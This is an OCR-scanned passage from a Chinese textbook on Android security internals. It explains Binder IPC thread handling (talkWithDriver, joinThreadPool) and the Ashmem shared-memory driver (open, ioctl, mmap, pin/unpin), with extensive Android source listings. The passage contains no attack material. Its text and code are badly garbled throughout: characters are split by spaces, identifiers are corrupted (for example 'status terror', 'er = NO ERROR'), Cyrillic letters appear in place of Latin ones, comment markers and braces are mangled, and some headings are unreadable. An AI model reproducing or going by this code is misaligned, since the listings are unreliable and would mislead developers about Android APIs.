const status terror = the_context_object->transact(tr.code, buffer, &reply, tr.flags); 
if (error < NO ERROR) reply.setError(error); 
} 


lALOGI("<<<< TRANSACT from pid %d restore pid %а uid %d\n", 
I mCallingPid, origPid, origUid); 


if((trflags & TF ONE WAY) == 0) { 
LOG ONEWAY ("Sending reply to %d!", mCallingPid); 
sendReply(reply, 0); 
) else ( 
LOG ONEWAY("NOT sending reply to %d!", mCallingPid); 
} 


mCallingPid = origPid; 
mCallingUid = origUid; 


IF LOG. TRANSACTIONS() { 
TextOutput::Bundle b(alog); 
alog << "BC. REPLY thr " << (void*)pthread self() <<" / obj" 
<< tr.target.ptr << ": " << indent << reply << dedent << endl; 


break; 


case BR DEAD. BINDER: 


{ 
BpBinder *proxy = (BpBinder*)mln.readlnt32(); 
proxy->sendObituary(); 
mOut.writelnt32(BC DEAD BINDER DONE); 
moOut.writeInt32((int32 t)proxy); 

) break; 


case BR CLEAR DEATH NOTIFICATION. DONE: 


{ 


BpBinder *proxy = (BpBinder*)mln.readlnt32(); 
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proxy->getWeakRefs()->decWeak(proxy); 
} break; 


case BR_FINISHED: 
result = TIMED OUT; 
break; 


case BR NOOP: 
break; 


case BR SPAWN LOOPER: 
mProcess->spawnPooledThread(false); 
break; 


default: 
printf("*** BAD COMMAND %d received from Binder driver\n", cmd); 
result = UNKNOWN ERROR; 
break; 


} 


if (result |= NO ERROR) { 
mLastError = result; 


} 


return result; 
} 
在 和 Binder 设备 进行 交互 时 ,是 通过 函数 write() 和 函数 read() 来 发 送 和 接收 请 求实 现 的 。 接 下 来 看 函数 

talkwithDriver()， 此 函数 在 文件 IPCThreadState.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 

status t IPCThreadState::talkWithDriver(bool doReceive) 
{ 

if (mProcess->mDriverFD <= 0){ 

return -EBADF; 
} 


binder_write_read bwr; 


11 15 the read buffer empty 
const bool needRead = mln.dataPosition() >= mln.dataSize(); 


11 We don't want to write anything if we are still reading 

11 from data left in the input buffer and the caller 

ll has requested to read the next data 

const size_t outAvail = (IdoReceive || needRead) ? mOut.dataSize() : 0; 


bwr.write size = outAvail; 
bwr.write buffer = (long unsigned int)mOut.data(); 


ll This is what we'll read 
if (doReceive && needRead) ( 


bwr.read size = min.dataCapacity(); 


#4 Android 通信 安全 机 制 


bwr.read buffer = (long unsigned int)mln.data(); 
) else { 

bwr.read_size = 0; 

bwr.read buffer = 0; 
} 


IF LOG COMMANDS() { 

TextOutput::Bundle b(alog); 

if (outAvail != 0) ( 
alog «« "Sending commands to driver: " «« indent; 
const void* cmds = (const void*)bwr.write buffer; 
const void* end 7 ((const uint8 t*)cmds)*bwr.write size; 
alog «« HexDump(cmds, bwr.write size) «« endl; 
while (cmds < end) cmds = printCommand(alog, ста); 
alog «« dedent; 

} 

alog << "Size of receive buffer: " << bwr.read size 
<<", needRead: " << needRead << ", doReceive: " << doReceive << endl; 


) 


// Return immediately if there is nothing to do 
if ((Dbwr.write size == 0) && (bwr.read size == 0)) return NO ERROR; 


bwr.write consumed = 0; 
bwr.read consumed = 0; 
status terr; 
do( 
IF LOG COMMANDS() ( 
alog << "About to read/write, write size = " << mOut.dataSize() << endl; 
) 
#if defined(HAVE ANDROID OS) 
if (ioctl(mProcess->mDriverFD, BINDER WRITE READ, &bwr) >= 0) 
er = NO ERROR; 
else 
err = -errno; 
#else 
err = INVALID_OPERATION; 
#endif 
if (mProcess->mDriverFD <= 0) ( 
err = -EBADF; 
) 
IF LOG COMMANDS() ( 
alog << "Finished read/write, write size = " << mOut.dataSize() << endl; 
} 
} while (err == -EINTR); 


IF LOG COMMANDS(|) { 
alog «« "Our err: " «« (void*)err «« ", write consumed: " 
<< bwr.write consumed << " (of " << mOut.dataSize() 
<< "), read consumed: " << bwr.read consumed << endl; 
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if (err >= NO_ERROR) { 
if (bwr.write_consumed > 0) { 
if (bwr.write_consumed < (ssize t)mOut.dataSize()) 
mOut.remove(0, bwr.write_consumed); 
else 
mOut.setDataSize(0); 
} 
if (bwr.read_consumed > 0) { 
min.setDataSize(bwr.read_consumed); 
min.setDataPosition(0); 
} 
IF_LOG_COMMANDS() { 
TextOutput::Bundle b(alog); 
alog << "Remaining data size: " << mOut.dataSize() << endl; 
alog << "Received commands from driver: " << indent; 
const void* cmds = min.data(); 
const void* end = min.data() + min.dataSize(); 
alog << HexDump(cmds, min.dataSize()) << endl; 
while (cmds < end) стаз = printReturncommand(alog, ста); 


alog << dedent; 
} 
return NO_ERROR; 
b 
return err; 


) 
4.6.5 startThreadPool 和 joinThreadPool 


接 下 来 看 最 后 两 个 函数 startThreadPool() ll joinThreadPool(), 其 中 , 函数 startThreadPool() fE X fF Process- 
State.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
void ProcessState::startThreadPool() 


{ 
AutoMutex _I(mLock); 
if (ImThreadPoolStarted) ( 
mThreadPoolStarted = true; 
spawnPooledThread(true); 
} 
} 


在 上 述 代码 中 ， 函 数 spawnPooledThread() 的 实现 如 下 所 示 。 
void ProcessState::spawnPooledThread(bool isMain) 


// 注 意 ，isMain 参数 是 true。 
if (mThreadPoolStarted) ( 
int32 t s = android atomic add(1, &mThreadPoolSeq); 
char buf[32]; 
sprintf(buf, "Binder Thread #%d", s); 
sp<Thread> t = new PoolThread(isMain); 
t->run(buf); 
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} 
} 
PoolThread 是 在 IPCThreadState 中 定义 的 一 个 Thread 子 类 ， 此 类 在 文件 PCThreadState.h 中 定义 ， 具 体 
实现 代码 如 下 所 示 。 
class PoolThread : public Thread 
t 
public: 
PoolThread(bool isMain) 
: misMain(isMain)( } 
protected: 
virtual bool threadLoop() 


/| 线程 函数 很 简单 ， 不 过 是 在 这 个 新 线程 中 又 创建 了 一 个 IPCThreadState. 
IPCThreadState::self()->joinThreadPool(mlsMain); 
return false; 
} 
const bool mlsMain; 
X 
接 下 来 看 IPCThreadState 的 joinThreadPool0 函 数 的 实现 ， 因 为 新 创建 的 线程 也 会 调用 这 个 函数 。 此 函 
数 在 文件 ProcessState.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
void IPCThreadState::joinThreadPool(bool isMain) 
{ 
// 如 果 isMain 为 true 则 需要 循环 处 理 。 把 请 求 信息 写 到 тош 中 ， 稍 后 一 起 发 出 去 
LOG THREADPOOL("**** THREAD %p (PID %d) IS JOINING THE THREAD POOL n", (void*) 
pthread self(), getpid()); 


mOut.writeInt32(isMain ? BC ENTER LOOPER : BC REGISTER LOOPER); 
set sched policy(mMyThreadld, SP FOREGROUND); 


status t result; 
do( 
int32 t cmd; 


// When we've cleared the incoming command queue, process any pending derefs 
if (mIn.dataPosition() >= min.dataSize()) ( 
size_t numPending = mPendingWeakDerefs.size(); 
if (numPending > 0) ( 
for (size_t i = 0; і < numPending; i++) { 
RefBase::weakref_type* refs = mPendingWeakDerefs[i]; 
refs->decWeak(mProcess.get()); 


} 
mPendingWeakDerefs.clear(); 


} 
// 处 理 已 经 死亡 的 ВВіпаег WR 
numPending = mPendingStrongDerefs.size(); 
if (numPending > 0) ( 
for (size ti = 0; і < numPending; i++) ( 
BBinder* obj  mPendingStrongDerefs[i]; 
obj->decStrong(mProcess.get()); 
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mPendingStrongDerefs.clear(); 
} 


} 
/发 送 命令 ， 读 取 请 求 

result = talkWithDriver(); 

if (result >= NO_ERROR) { 
size_t IN = min.dataAvail(); 
if (IN < sizeof(int32_t)) continue; 
ста = min.readint32(); 
IF_LOG_COMMANDS() { 

alog << "Processing top-level Command: " 
<< getReturnString(cmd) << endl; 


result = executeCommand(cmd); /处 理 消息 


set sched policy(mMyThreadld, SP_FOREGROUND); 
if(result == TIMED OUT && lisMain) { 
break; 


} while (result != -ECONNREFUSED && result != -EBADF); 


LOG_THREADPOOL("**** THREAD %p (PID %d) IS LEAVING THE THREAD POOL err=%p\n", 
(void*)pthread_self(), getpid(), (void*)result); 


mOut.writelnt32(BC EXIT LOOPER); 
talkWithDriver(false); 


由 此 可 见 ， 函 数 startThreadPool0 和 函数 joinThreadPool 在 通用 操作 函数 talk WithDriver 中 的 作用 非常 明确 。 

口 startThreadPool() 中 新 启动 的 线程 通过 joinThreadPool() 读 取 Binder 设 备 ， 查 看 是 否 有 请 求 。 

О 主线 程 也 调用 joinThreadPool0 读 取 Binder 设 备 ， 查 看 是 否 有 请 求 。 看 来 ，Binder 设 备 是 支持 多 线程 
操作 的 ， 其 中 一 定 是 做 了 同步 方面 的 工作 。 

在 进程 MediaServer 中 一 共 注 册 了 4 个 服务 ， 在 业务 繁忙 时 ， 两 个 线程 会 显得 有 点 “力不从心 ”。 另 外 ， 


如 果实 现 的 服务 负担 不 是 很 重 ， 则 完全 可 以 不 调用 startThreadPool0) 来 创建 新 的 线程 ， 在 此 时 使 用 主线 程 便 
可 以 胜任 。 
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内 存 (Memory) 也 被 称 为 内 存储 器 ， 是 计算 机 中 的 重要 部 件 之 一 ， 是 用 户 任 务 与 CPU 处 理 进行 沟通 的 
桥梁 ， 其 作用 是 用 于 暂时 存放 CPU 中 的 运算 数据 ， 以 及 与 硬盘 等 外 部 存储 器 交换 的 数据 。 只 要 是 运行 中 的 
计算 机 ，CPU 就 会 把 需要 运算 的 数据 调 到 内 存 中 进行 运算 处 理 ， 当 运算 完成 后 CPU 再 将 结果 传送 出 来 。 其 
实 智能 手机 就 是 一 台 微型 的 PC 机 ， 也 具有 和 计算 机 一 样 的 结构 ， 例 如 CPU 和 内 存 。 本 章 将 和 大 家 一 起 探 
讨 Android 内 存 系统 的 基本 知识 ， 为 学 习 本 书后 面 的 知识 打下 基础 。 


5.1] Ashmem 系统 详解 


EX 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 5 章 \Ashmem 系统 详解 .avi 

Android 系统 提供 了 匿名 共享 内 存 子 系统 Ashmem (Anonymous Shared Memory) ， 它 以 驱动 程序 的 形 
式 实现 在 内 核 空间 中 。 在 Android 系统 中 ，Ashmem 具有 如 下 两 个 特点 。 

口 能 够 辅助 内 存 管理 系统 来 有 效 地 管理 不 再 使 用 的 内 存 块 。 

О 通过 Binder 进 程 间 通 信 机 制 实现 进程 间 的 内 存 共享 。 

对 于 Android 系统 的 匿名 共享 内 存 子 系统 来 说 ， 其 主体 是 以 驱动 程序 的 形式 实现 在 内 核 空间 的 ， 同 时 ， 
在 系统 运行 时 库 层 和 应 用 程序 框架 层 提 供 了 访问 接口 。 其中, 在 系统 运行 时 库 层 提供 了 C/C++ 调 用 接口 ， 而 
在 应 用 程序 框架 层 提供 了 Java 调用 接口 。 在 此 将 直接 通过 应 用 程序 框架 层 提供 的 Java 调用 接口 来 说 明 匿 名 
共享 内 存 子 系统 Ashmem 的 使 用 方法 ， 毕 竞 在 Android 开发 应 用 程序 时 ， 是 基于 Java 语言 的 。 其 实 应 用 程 
序 框架 层 的 Java 调用 接口 是 通过 INI 方法 来 调用 系统 运行 时 库 层 的 C/C++ 调用 接口 ， 最 后 进入 到 内 核 空间 
的 Ashmem 驱动 程序 去 的 。 

Ashmem 驱动 程序 利用 了 Linux 的 共享 内 存 子 系统 导出 的 接口 来 实现 自己 的 功能 , 其 核心 功能 是 实现 创 
建 Copen) 、 映 射 (ттар) 、 读 写 (read/write) 以 及 锁定 和 解锁 Cpin/unpin) 。 为 了 深入 了 解 Ashmem Ж 
统 的 安全 机 制 ， 在 本 节 将 详细 讲解 Ashmem 驱动 程序 的 具体 实现 。 


5.1.1 基础 数据 结构 


在 Ashmem 驱动 程序 中 用 到 了 ashmem area. ashmem range 和 ashmem range 这 3 个 结构 体 ， 其 中 前 两 
个 结构 体 在 文件 kernel/goldfish/mm/ashmem.c 中 定义 ， 实 现代 码 如 下 所 示 。 


struct ashmem area ( 
char name[ASHMEM FULL. NAME. LENJ; 让 匿名 共享 内 存 的 名 称 */ 


struct list_head unpinned list; 让 解锁 内 存 列 表 */ 

struct file *file; 让 指向 临时 文件 系统 tmpfs 中 的 一 个 文件 */ 
size t size; PEKIN 

unsigned long prot_mask; EE 3ESE AGA RAL 


y 
struct ashmem range ( 
structlist head Iru; 广 最 近 最 少 使 用 的 列表 */ 
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struct list head unpinned; l'entry in its area's unpinned list*/ 
struct ashmem area *asma; l'associated area*/ 

size t pgstart; 让 处 于 解锁 状态 内 存 的 开始 地 址 */ 
size t pgend; 广 处 于 解锁 状态 内 存 的 结束 地 址 */ 
unsigned int purged; /解锁 内 存 是 否 被 收回 六 


X 

结构 体 ashmem area 用 于 表示 一 块 匿名 共享 内 存单 元 ， 结 构 体 ashmem range 用 于 表示 处 于 解锁 状态 的 
内 存 。 

结构 体 ashmem range 用 于 表示 被 锁定 或 被 解锁 的 内 存 ， 在 文件 kernel/goldfish/include/linux/ashmem.h 
中 定义 ， 具 体 代 码 如 下 所 示 。 


struct ashmem pin { 
__ч32 offset; 让 这 块 内 存 的 偏 移 值 */ 
—_u32 len; 让 这 块 内 存 的 大 小 */ 

y: 


结构 体 ashmem_fops 定义 了 dev/ashmem 的 操作 方法 列表 ， 具 体 代 码 如 下 所 示 。 
static struct file operations ashmem fops = ( 

.owner = THIS MODULE, 

.open = ashmem open, 

.release = ashmem release, 

.mmap = ashmem mmap, 

.unlocked ioctl = ashmem ioctl, 

.compat ioctl = ashmem ioctl, 


y 
5.1.2 ”初始 化 处 理 


在 Android 系统 中 ， 通 过 Ashmem 驱动 初始 化 函数 可 以 获取 如 下 两 
O Ashmem 给 用 户 空间 暴露 了 什么 接口 ， 即 创建 了 什么 样 的 设备 文件 。 
口 Ashmem 提 供 了 什么 函数 来 操作 这 个 设备 文件 。 
Ashmem 驱动 程序 在 文件 kemel/common/mm/ashmem.c 中 实现 ,其 中 ,函数 ashmem _init() 实 现 模 块 初始 
化 处 理 ， 主 要 实现 代码 如 下 所 示 。 
static struct miscdevice ashmem misc = ( 
.minor= MISC DYNAMIC MINOR, 
.name = "ashmem", 
.fops = &ashmem fops, 


static int init ashmem init(void) 
T 


int ret; 


ret = misc register(&ashmem misc); 

if (unlikely(ret)) { 
printk(KERN_ERR "ashmem: failed to register misc device!n"); 
return ret; 


} 


return 0; 
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在 上 述 代码 中 , 在 加 载 Ashmem 驱动 程序 时 会 创建 一 个 设备 文件 /dewashmem,， 这 是 一 个 misc 类 型 的 设 
备 。 通 过 函数 misc_register0 来 注册 misc 设备 , 调用 这 个 函数 后 会 在 /dev 目录 下 生成 一 个 Ashmem 设备 文件 。 
在 设备 文件 中 一 共 提 供 了 open. mmap, release 和 ioctl 4 种 操作 ， 此 处 并 没有 read 和 write 操作 ， 原 因 是 读 
写 共 享 内 存 的 方法 是 通过 内 存 映射 地 址 来 进行 的 ， 通 过 mmap 系统 调用 将 这 个 设备 文件 映射 到 进程 地 址 空 
间 中 。 与 此 同时 ， 直 接 对 内 存 进行 了 读 写 操作 ， 所 以 不 需要 通过 read 和 write 方式 进行 文件 操作 。 
匿名 共享 内 存 创建 功能 是 在 文件 frameworks/base/core/java/android/os/MemoryFile.java 中 实现 的 , 此 文件 
调用 了 类 MemoryFile 的 构造 函数 ，MemoryFile 的 构造 函数 调用 了 JNI 函数 native open， 这 样 便 创 建 了 匿名 
内 存 共享 文件 。JNI 方法 native_open() 在 文件 frameworks/base/core/jni/adroid os MemoryFile.cpp PIW, H 
体 代码 如 下 所 示 。 

static jobject android os MemoryFile open(JNIEnv* env, jobject clazz, jstring name, jint length) 

{ 


const char* namestr = (name ? env->GetStringUTFChars(name, NULL) : NULL); 
int result = ashmem create region(namestr, length); 


if (name) 
env->ReleaseStringUTFChars(name, namestr); 


if (result « 0) ( 
jniThrowException(env, "java/io/IOException", "ashmem create region failed"); 
return NULL; 

} 


return jniCreateFileDescriptor(env, result); 
} 
函数 native_open() 通 过 运行 时 库 提供 的 接口 ashmem_create_region 创建 匿名 共享 内 存 ， 这 个 接口 在 文件 
system/core/libcutils/ashmem-dev.c 中 实现 ， 有 具体 代码 如 下 所 示 。 
int ashmem create region(const char *name, size t size) 


{ 
int fd, ret; 


fd = open(ASHMEM_DEVICE, O_RDWR); 
if (fd < 0) 
return fd; 


if (name) ( 
char buflASHMEM_NAME LEN]; 


stricpy(buf, name, sizeof(buf)); 
ret = ioctl(fd, ASHMEM SET NAME, buf); 
if (ret « 0) 

goto error; 


} 


ret = ioctl(fd, ASHMEM SET SIZE, size); 
if (ret « 0) 
goto error; 
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return fd; 


error: 


) 
在 上 


close(fd); 
return ret; 


述 代码 中 ， 通 过 执行 3 个 文件 操作 系统 调用 的 方式 和 Ashmem 驱动 程序 进行 交互 。 通 过 open 操作 


打开 设备 文件 ASHMEM_DEVICE， 通 过 ioctl 操作 设置 匿名 共享 内 存 的 名 称 和 大 小 。 
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打开 匿名 共享 内 存 设备 文件 


open 进入 内 核 后 会 调用 函数 ashmem_open() 打 开 匿 名 共享 内 存 设备 文件 ， 此 函数 能 够 为 程序 创建 一 个 


ashmem : 


area 结构 体 ， 具 体 实现 代码 如 下 所 示 。 


static int ashmem_open(struct inode *inode, struct file *file) 


{ 


struct ashmem_ area *asma; 
int ret; 
ret = nonseekable open(inode, file); 
if (unlikely(ret)) 
retum ret; 
asma = kmem cache zalloc(ashmem area cachep, GFP KERNEL); 
if (unlikely(!asma)) 
return -ENOMEM; 
INIT_LIST_HEAD(&asma->unpinned_list); 
memcpy(asma-»name, ASHMEM NAME PREFIX, ASHMEM_NAME_PREFIX_LEN); 
asma-»prot mask = PROT MASK; 
file-2private data = asma; 
return 0; 


) 
上 述 代码 的 执行 流程 如 下 所 示 。 


口 
口 


口 


side 
side 
口 


通过 函数 nonseekable_open() 设 置 这 个 文件 不 可 以 执行 定位 操作 ， 即 不 可 执行 sSeek 文 件 操作 。 
通过 函数 kmem_cache_zalloc(0) 在 刚 创建 的 slab 缓 冲 区 ashmem_area_cachep 中 创建 一 个 ashmem_area 
结构 体 ， 并 将 创建 的 结构 体 保 存在 本 地 变量 asma 中 。 
初始 化 变量 asma 的 其 他 域 ， 其 中 域 name 初 始 为 宏 ASHMEM_NAME PREFIX， 宏 ASHMEM_ 
NAME_PREFIX 的 定义 代码 如 下 。 
fine ASHMEM NAME PREFIX "dev/ashmem/" 
fine ASHMEM NAME. PREFIX. LEN (sizeof(ASHMEM NAME. PREFIX)- 1) 
将 结构 ashmem_area 保 存在 打开 文件 结构 体 的 private_data 域 中 , 此 时 通过 使 用 Ashmem 驱 动 程 序 , 可 
以 在 其 他 模块 通过 private_data 域 来 取 回 这 个 ashmem _area 结 构 。 


在 函数 ashmem_create_region() 中 调用 了 两 次 ioctl 文件 操作 ， 功 能 是 设置 新 建 匿 名 共享 内 存 的 名 字 和 大 
小 。 在 文件 kernel/comon/mm/include/ashmem.h 中 ，ASHMEM_SET NAME 和 ASHMEM SET SIZE 分 别 表 
示 新 建 内 存 的 名 字 和 大 小 ， 有 具体 定义 代码 如 下 所 示 。 

#define ASHMEM_NAME_LEN256 

#define _ ASHMEMIOCOx77 

#define ASHMEM_SET_NAME_IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN]) 

#define ASHMEM SET SIZE IOW(  ASHMEMIOC, 3, size_t) 


Hy 


H, ASHMEM SET NAME 的 ioctl 调用 会 进入 到 Ashmem 驱动 程序 函数 ashmem _ioctl() 中 ， 此 函数 
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能 够 将 从 用 户 空 间 传 进来 的 匿名 共享 内 存 的 大 小 值 保存 在 对 应 的 asma->size 域 中 。 函 数 ashmem | ioctl ff < 
现代 码 如 下 所 示 。 

static long ashmem ioctl(struct file *file, unsigned int cmd, unsigned long arg) 

t 


struct ashmem area *asma = file->private data; 
long ret = -ENOTTY; 
Switch (cmd) ( 
case ASHMEM SET NAME: 
геї = set name(asma, (void _ user *) arg); 
break; 
case ASHMEM GET NAME: 
ret = get name(asma, (void _ user *) arg); 
break; 
case ASHMEM SET SIZE: 
ret = -EINVAL; 
if (lasma-»file) ( 
ret = 0; 
asma-»size - (size t) arg; 
} 
break; 
case ASHMEM_GET SIZE: 
ret = asma->size; 
break; 
case ASHMEM SET PROT MASK: 
ret = set prot mask(asma, arg); 
break; 
case ASHMEM GET PROT MASK: 
ret = asma-»prot mask; 
break; 
case ASHMEM PIN: 
case ASHMEM UNPIN: 
case ASHMEM GET PIN STATUS: 
ret = ashmem pin unpin(asma, cmd, (void _ user *) arg); 
break; 
case ASHMEM PURGE ALL CACHES: 
ret = -EPERM; 
if (capable(CAP_SYS_ADMIN)) ( 
ret = ashmem shrink(0, GFP_KERNEL); 
ashmem_shrink(ret, GFP_KERNEL); 
} 
break; 
} 
return ret; 
} 
上 述 代 码 主要 完成 如 下 两 个 功能 。 
口 structashmem area *asma = file->private_data: 获取 描述 将 要 改名 的 匿名 共享 内 存 asma。 
O ret-set name(asma, (void _user *) arg): 调用 函数 set_name() 修 改 匿名 共享 内 存 的 名 称 。 
函数 set_name0 也 是 在 文件 kernel/goldfish/mm/ashmem.c 中 实现 的 ， 功 能 是 把 用 户 空 间 传 进来 的 匿名 共 
享 内 存 的 名 字 设 置 到 asma->name 域 中 。 函 数 set_name() 的 具体 实现 代码 如 下 所 示 。 
© 
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static int set name(struct ashmem area *asma, void _ user *name) 
{ 
int ret = 0; 
mutex_lock(&ashmem_mutex); 
/* cannot change an existing mapping's name */ 
if (unlikely(asma->file)) { 
ret = -EINVAL; 
goto out; 


i 
if (unlikely(copy_from_user(asma->name + ASHMEM_NAME_PREFIX_LEN, 
name, ASHMEM NAME LEN))) 
ret = -EFAULT; 
asma-»name[ASHMEM FULL NAME LEN-1] = "0'; 
out: 
mutex unlock(&ashmem mutex); 
return ret; 


} 
到 此 为 止 ， 创 建 匿名 共享 内 存 的 过 程 就 全 部 介绍 完毕 了 。 
5.1.4 内存 映射 


Ashmem 驱动 程序 并 不 提供 文件 的 read 操作 和 write 操作 ， 如 果 进 程 要 访问 这 个 共享 内 存 ， 则 必须 将 这 
个 设备 文件 映射 到 自己 的 进程 空间 中 ， 然 后 才能 进行 内 存 访问 。 在 类 MemoryFile 的 构造 函数 中 ， 创 建 
共享 内 存 后 需要 把 匿名 共享 内 存 设 备 文件 映射 到 进程 空间 。 映射 功能 是 通过 调用 JNI 方法 native ттар 实现 
的 ， 此 JNI 方 法 在 文件 frameworks/base/core/jni/adroid os MemoryFile.cpp 中 实现 ， 有 具体 代码 如 下 所 示 。 
static jint android os MemoryFile mmap(JNIEnv* env, jobject clazz, jobject fileDescriptor, 
jint length, jint prot) 


{ 
int fd = jniGetFDFromFileDescriptor(env, fileDescriptor); 
jint result = (jint)ymmap(NULL, length, prot, MAP SHARED, fd, 0); 
if (Iresult) 
jniThrowException(env, "java/io/IOException", "mmap failed"); 
return result; 


} 

在 上 述 代码 中 ， 在 open 匿名 设备 文件 /dev/ashmem 中 获得 文件 描述 符 得 。 有 这 个 文件 描述 符 后 ， 就 可 
以 直接 通过 函数 mmap0 执 行内 存 映 射 操作 了 。 当 调用 函数 mmap() 打 开 映 射 到 进程 的 地 址 空间 时 , 会 立即 执 
行 Ashmem 中 的 函数 ashmem_mmap()。 函 数 ashmem_mmap() 的 功能 是 调用 Linux 内 核 中 的 函数 
shmem_file_setup0 在 临时 文件 系统 tmpfs 中 创建 一 个 临时 文件 , 这 个 临时 文件 与 Ashmem 驱动 程序 创建 的 匿 
名 共享 内 存 对 应 。 函 数 ashmem_mmap() 在 文件 kernel/goldfish/mm/ashmem.c 中 定义 , 具体 实现 代码 如 下 所 示 。 

static int ashmem_mmap(struct file *file, struct vm area struct *vma) 


{ 


struct ashmem area *asma = file->private data; 
int ret = 0; 
mutex lock(&ashmem mutex); 
FRP ѕеі size 映射 之 前 */ 
if (unlikely(!asma->size)) ( 
ret = -EINVAL; 
goto out; 
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} 
广 保护 位 必须 与 所 允许 的 相符 */ 
if (unlikely((vma-»vm flags & ~asma->prot_mask) & PROT MASK)) ( 
ret = -EPERM; 
goto out; 
} 
if (lasma->file) { 
char *name = ASHMEM NAME DEF; 
struct file *vmfile; 
if (asma-»name[ASHMEM NAME PREFIX LEN] != 0") 
name = asma->name; 
/* ... and allocate the backing shmem file */ 
vmfile = shmem_file_setup(name, asma->size, vma->vm_flags); 
if (unlikely(IS_ERR(vmfile))) { 
ret = PTR_ERR(vmfile); 
goto out; 
} 
asma->file = vmfile; 
} 
get_file(asma->file); 
if (vma->vm_flags & VM_SHARED) 
shmem set file(vma, asma->file); 


else ( 
if (vma->vm_file) 
fput(vma->vm_file); 
vma->vm_file = asma->file; 
} 
vma-»vm flags |= VM_CAN_NONLINEAR; 
out: 
mutex_unlock(&ashmem_mutex); 
return ret; 
} 


在 上 述 代码 中 ， 检 查 了 虚拟 内 存 vma 是 否 允许 在 不 同 进程 之 间 实 现 共享 。 如 果 允 许 则 调用 函数 
shmem_set_file() 来 设置 其 映射 文件 和 内 存 操作 方法 表 。 


5.4.5 SMI SRE 


从 类 MemoryFile 中 可 以 获得 读 写 操作 的 过 程 ， 对 应 的 代码 如 下 所 示 。 
private static native int native read(FileDescriptor fd, int address, byte[ ] buffer, 
int srcOffset, int destOffset, int count, boolean isUnpinned) throws IOException; 
private static native void native write(FileDescriptor fd, int address, byte[] buffer, 
int srcOffset, int destOffset, int count, boolean isUnpinned) throws IOException; 


private FileDescriptor mFD; ll ashmem file descriptor 
private int mAddress; 11 address of ashmem memory 
private int mLength; // total length of our ashmem region 


private boolean mAllowPurging = false; // true if our ashmem region is unpinned 
public int readBytes(byte[ ] buffer, int srcOffset, int destOffset, int count) 
throws IOException { 
if (isDeactivated()) { 
throw new IOException("Can't read from deactivated memory file."); 
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} 
if (destOffset < 0 || destOffset > buffer.length || count < 0 
|| count > buffer.length - destOffset 
|| srcOffset < 0 || srcOffset > mLength 
|| count > mLength - srcOffset) { 
throw new IndexOutOfBoundsException(); 
} 
return native_read(mFD, mAddress, buffer, srcOffset, destOffset, count, mAllowPurging); 
} 
public void writeBytes(byte[ ] buffer, int srcOffset, int destOffset, int count) 
throws IOException { 
if (isDeactivated()) { 
throw new IOException("Can't write to deactivated memory file."); 
} 
if (srcOffset < 0 || srcOffset > buffer.length || count < 0 
|| count > buffer.length - srcOffset 
|| destOffset < 0 || destOffset > mLength 
|| count > mLength - destOffset) { 
throw new IndexOutOfBoundsException(); 
} 
native_write(mFD, mAddress, buffer, srcOffset, destOffset, count, mAllowPurging); 
} 
通过 对 上 述 代码 的 分 析 可 知 ， 是 通过 调用 JNI 方法 实现 读 写 匿 名 共享 内 存 操作 功能 。 读 操作 的 INI 方法 
是 native read0)， 写 操作 的 NI 方法 是 native_write()， 这 两 个 方法 都 在 文件 frameworks/base/core/jni/ 
adroid os MemoryFile.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
static jint android os MemoryFile read(JNIEnv* env, jobject clazz, 
jobject fileDescriptor, jint address, jbyteArray buffer, jint srcOffset, jint destOffset, 
jint count, jboolean unpinned) 


int fd = jniGetFDFromFileDescriptor(env, fileDescriptor); 

if (unpinned && ashmem pin region(fd, 0, 0) == ASHMEM WAS PURGED)( 
ashmem unpin region(fd, 0, 0); 
jniThrowException(env, "java/io/lOException", "ashmem region was purged"); 
return -1; 


) 
env->SetByteArrayRegion(buffer, destOffset, count, (const jbyte *)address + srcOffset); 


if (unpinned) ( 
ashmem unpin region(fd, 0, 0); 
} 


return count; 


} 
static jint android_os_MemoryFile_write(JNIEnv* env, jobject clazz, 
jobject fileDescriptor, jint address, jbyteArray buffer, jint srcOffset, jint destOffset, 
jint count, jboolean unpinned) 
int fd = jniGetFDFromFileDescriptor(env, fileDescriptor); 
if (unpinned && ashmem_pin_region(fd, 0, 0) == ASHMEM_WAS_PURGED) { 
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ashmem unpin region(fd, 0, 0); 
jniThrowException(env, "java/io/lOException", "ashmem region was purged"); 
return -1; 
} 
env->GetByteArrayRegion(buffer, srcOffset, count, (jbyte *)address + destOffset); 
if (unpinned) { 
ashmem_unpin_region(fd, 0, 0); 
} 


return count; 


} 

在 上 述 代 码 中 ,函数 ashmem_pin_region() 和 函数 ashmem_unpin_region(0) 用 于 为 系统 运行 时 库 提供 接口 ， 
功能 是 执行 匿名 共享 内 存 的 锁定 和 解锁 操作 。 这 样 便 能 够 通知 Ashmem 驱动 程序 哪些 内 存 块 是 正在 使 用 的 ， 
哪些 需要 锁定 ， 哪 些 不 需要 使 用 ， 哪 些 可 以 解锁 。 这 两 个 函数 在 文件 system/core/libcutils/ashmem-dev.c 中 定 
义 ， 有 具体 实现 代码 如 下 所 示 。 

int ashmem pin region(int fd, size t offset, size_t len) 


{ 


struct ashmem_pin рїп = { offset, len }; 

return ioctl(fd, ASHMEM PIN, &pin); 
} 
int ashmem_unpin_region(int fd, size_t offset, size_t len) 
i 

struct ashmem_pin pin = { offset, len }; 

return ioctl(fd, ASHMEM UNPIN, &pin); 


) 
经 过 上 述 操作 之 后 ，Ashmem 驱动 程序 就 可 以 在 整个 内 存 管理 系统 中 管理 内 存 。 
5.1.6 ”锁定 和 解锁 机 制 


在 Android 系统 中 ， 通 过 如 下 两 个 ioctl 操作 实现 匿名 共享 内 存 的 锁定 和 解锁 操作 。 

口 ASHMEM PIN. 

口 ASHMEM_UNPIN。 

ASHMEM PIN 和 ASHMEM_UNPIN 在 文件 kernel/common/include/linux/ashmem.h 中 定义 , 对 应 代码 如 
下 所 示 。 

#define _ ASHMEMIOC 0x77 

#define ASHMEM PIN IOW( . ASHMEMIOC, 7, struct ashmem_pin) 

#define ASHMEM UNPIN IOW( _ ASHMEMIOC, 8, struct ashmem pin) 


Struct ashmem pin ( 

. U32 offset; /*offset into region, in bytes, page-aligned */ 

. u32len; /* length forward from offset, in bytes, page-aligned */ 
Е 


再 看 函数 ashmem_ioctl(), 在 其 实现 代码 中 ASHMEM PIN 和 ASHMEM UNPIN 这 两 个 操作 相关 的 代码 
如 下 所 示 。 
